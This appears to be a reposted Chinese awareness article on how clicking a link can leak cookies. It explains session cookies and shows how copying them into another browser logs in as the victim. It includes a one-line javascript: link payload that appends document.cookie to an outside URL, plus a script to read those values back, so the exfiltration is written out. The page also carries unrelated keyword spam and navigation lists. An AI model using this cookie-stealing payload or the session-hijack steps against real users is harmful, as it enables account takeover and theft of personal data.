位置: IT常识 - 正文

点了下链接信息就泄露了,ta们是怎么做到的?(隐隐作痛怎么写)

编辑:rootadmin
原力计划点了下链接信息就泄露了,ta们是怎么做到的?

推荐整理分享点了下链接信息就泄露了,ta们是怎么做到的?(隐隐作痛怎么写),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:隐隐作痛怎么写,民国时期派克钢笔价格,民国时期派克钢笔价格,上海画家陆志文,社保换省不转的话就作废了么,坚美蓝光断桥,坚美蓝光断桥,上海画家陆志文,内容如对您有帮助,希望把文章链接给更多的朋友!

随着互联网的普及以及一系列可供上网设备的快速发展,截止2022年12月,中国网民规模达10.37亿,较之2021年12月增长3549万,互联网普及率达75.6%;在这么庞大的数据背后又有多少用户的个人信息被泄露呢?

一、信息泄露常见场景1.1 手机号码泄露导致的骚扰短信或电话1.2 不同的平台账号被盗后用于群发非法信息二、cookie2.1 什么是cookie2.2 登录及访问网站的流程2.3 如何跨浏览器使用cookie三、信息是如何泄露的?3.1 点击不明链接3.1 通过JS获取cookie3.2 从地址栏获取参数并进行截取一、信息泄露常见场景1.1 手机号码泄露导致的骚扰短信或电话

1.2 不同的平台账号被盗后用于群发非法信息

备注:图源网络

二、cookie2.1 什么是cookie

在介绍之前,我们首先需要了解什么是cookie,类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。 举例来说, 一个 Web 站点可能会为每一个访问者产生一个唯一的ID, 然后以 Cookie 文件的形式保存在每个用户的机器上。如果使用浏览器访问 Web, 会看到所有保存在硬盘上的 Cookie。 在这个文件夹里每一个文件都是一个由“名/值”对组成的文本文件,另外还有一个文件保存有所有对应的 Web 站点的信息。在这里的每个 Cookie 文件都是一个简单而又普通的文本文件。透过文件名, 就可以看到是哪个 Web 站点在机器上放置了Cookie(当然站点信息在文件里也有保存) 。 所谓“cookie”数据是指某些网站为了辨别用户身份,储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。 通俗来讲就是指缓存数据,包括用户名、密码、注册账户、手机号等公民个人信息。 介绍源自百科

2.2 登录及访问网站的流程

我们在接下来的流程演示中以百度为例。 场景如下:我昨天用百度APP浏览了一些我很感兴趣的内容,今天我在电脑上想再看一下,但是我并没有将那些网址记下来, (想必大家上网冲浪的时候也没有背诵网址的习惯吧) 那只能在这个新的终端通过登录并查看历史浏览记录才能达到这一效果了。

在谷歌浏览器访问百度发现处于未登录的状态,输入账号密码并点击登录,校验信息成功后会返回cookie并跳转或刷新页面。如下图即为登录流程以及成功后的页面显示

那么如何查看cookie呢? 在浏览器右击点击检查 点击上方的Application选项卡 点击左侧的Cookies栏目,即可查看浏览器的cookie信息 现在可以看到有百度的cookie的信息,它是通过不同的网站进行分类,Name列与Value列是类似于键值对的关系进行组合

cookie也看到了,那我现在想要访问一下我的个人中心,需要跳转页面才能实现,那这个过程是不是还需要再次登录呢?

很显然是不用的,这是因为服务器有检测到这个有效cookie,所以后续一系列的访问都会放行让我们顺利通关。 那么可想而知,这个信息如果被别人掌握了,是不是就意味着他们能冒充我们的身份呢? 大腿一拍:“坏了! 我成替身了!!”

点了下链接信息就泄露了,ta们是怎么做到的?(隐隐作痛怎么写)

2.3 如何跨浏览器使用cookie

市面上有着丰富的浏览器供用户选择使用,如:谷歌、火狐、Edge、等,但是不同的浏览器之间进行cookie的读取显然是不可行的,很简单的一个例子,现在我在百度登录了我的账号,那么我在火狐浏览器访问百度很明显是处于未登录的状态,因为不同的浏览器的cookie就是给各自的浏览器使用的

假设啊,这里我只是假设,假设你的对象截取到了你在谷歌浏览器的cookie并通过别的浏览器登录你的账号,ta该如何操作呢? 首先,ta在火狐浏览器鼠标右键点击检查,点击存储,点击cookie,在下方点击全部删除,将现有cookie清空

然后ta打开了你的谷歌浏览器右键检查,点击Application,点击cookie,将百度服务器返回给你cookie信息一条条复制过去; 当然也可以借助浏览器插件(cookie-editor)批量导出,放到文本编辑器中可以看到就是这种JSON格式的数据

在火狐浏览器同样安装这个插件,将数据复制过来,点击导入,然后刷新页面,可以看到在火狐浏览器没有进行什么账号密码的校验也登录成功了,那是不是意味着ta想干什么都可以呢

三、信息是如何泄露的?3.1 点击不明链接

这时候大家可能就会说了,我没有对象,没人来截取我的cookie。大话不要说太早,我们首先新建一个html文件,在里面放上一个a标签并写上一些很有诱惑力的语句,这样看上去是不是就很想点一下呢?

<a href="">猜你喜欢,点我有惊喜</a>3.1 通过JS获取cookie

我们先通过手动插入的方式给这个网址加入一些cookie,右击检查,选择Application、Cookies,在右侧双击即可添加cookie

随后点击Console选项卡,输入document.cookie,即可输出该网站的所有cookie信息

document.cookie

这时候我们再对上面的超链接修饰一下,跳转到别人用心的人部署的网站,并通过拼接地址栏参数的形式将cookie携带出去

<a href="javascript:location.href='http://www.baidu.com?'+document.cookie">猜你喜欢,点我有惊喜</a>3.2 从地址栏获取参数并进行截取

点击该超链接,可以在地址栏看到刚才我们在那个网址所添加的cookie信息都以参数的形式携带过来了

现在我们已经携带着自己的信息跳转到了别有用心的人的网站,ta如何通过JS获取地址栏参数呢

function GetQueryString(name){ var reg = new RegExp( "(^|&)" + name + "=([^&]*)(&|$)" ); var r = window.location.search.substr(1).match(reg); if (r!= null ) return unescape(r[2]); return null ;}// 调用方法alert(GetQueryString( "参数名1" ));

到了这一步可以说是已经无法挽回了,这也是你时常会收到骚扰电话、短信、盗号提醒的原因之一,希望大家在网上冲浪的时候守护好自己的个人信息

本文链接地址:https://www.jiuchutong.com/zhishi/292348.html 转载请保留说明!

上一篇:波来古市附近的Chu Dang Ya火山,越南嘉来 (© Quang Ngoc Nguyen/Alamy)(波来古市在哪里)

下一篇:【uni-app系列】uni-app之nvue使用(uni-app介绍)

  • 增值税几个点怎么算
  • 对本次疫情有什么看法
  • 投资款要不要交企业所得税
  • 月末一般无余额的有
  • 个人独资企业生产经营所得汇算清缴时间
  • 建筑企业外地预缴
  • 简易计征开什么发票
  • 上月未记账本月可以记账吗
  • 进口产品不付汇会造成什么
  • 资产申报是什么
  • 商贸公司可以用加工厂的商标委托加工生产吗
  • 古董卖给公司
  • 以前年度的收入怎么调整
  • 受托加工费的成本都有什么
  • 银行利息收入可以开增值税专用发票
  • 需要预缴增值税
  • 企业注销难道必须要交房产税吗?
  • 固定资产销售税务处理
  • 个税申报表的含税金额
  • 企业税收负担率一般达到多少算正常
  • 企业所得税营业利润怎么算
  • 实时扣税3001会计科目
  • 收购粮食怎么做账
  • 增值税发票压线能用吗
  • 敏感资产额怎么算
  • 怎么计算房地产成本单价
  • 设备租赁收入属于什么收入
  • 补交以前年度个税怎么做账
  • 负债率是什么指标
  • deepin隐藏分区
  • wlms.exe是什么
  • 注册造价师挂靠费怎么缴纳个税
  • mp3格式最高音质
  • 自产的产品对外捐赠
  • 季度利润表中的营业收入怎么算
  • javascript移动鼠标
  • vue错误处理
  • f12过滤请求
  • 微信支付开发包
  • ie11已经为了帮助保护您的计算机而关闭此网页
  • mlocate.db 删除
  • 弥补以前年度亏损最多几年
  • 农民工工资专用账户打款比例
  • 劳务公司的账务怎么做
  • 企业贷款贴息怎么做账
  • phpcms v9安装教程
  • 免费开源okr管理系统
  • 购买一台电脑2400元贵吗
  • 什么叫网银盾账户
  • 如何界定人力资源管理
  • 企业研发费用的优惠政策
  • 汇算清缴没有调整怎么办
  • 税收种类包括哪几种
  • 限定性净资产是资产类科目吗
  • 交易性金融资产入账价值怎么计算
  • 一般纳税人税种核定表
  • 企业所得税弥补亏损可以弥补几年
  • 社会团体收到的会费怎么入账
  • 银行承兑汇票到期无力支付计入什么科目
  • 基本生产成本科目应该按成本计算对象
  • 用友为什么引入不了账套
  • 股东退股如何清算
  • 小规模纳税人季报网上申报流程
  • 安装win8一直卡在转圈圈
  • centos配置IP地址
  • 如何设置自动删除安装包
  • 内核版本能升级吗
  • win7无法打开windows功能
  • gnu grub卸载
  • cocos2dx4.0教程
  • 铁嘴的故事
  • javascript数组去重代码
  • unity3d音效
  • 设计模式工厂模式使用场景
  • vue router 组件
  • shell 命令执行顺序
  • js脚本如何获取数据库内容?
  • 我置顶你也只顶你
  • 详解16型人格
  • 企业所得税计算器在线计算
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设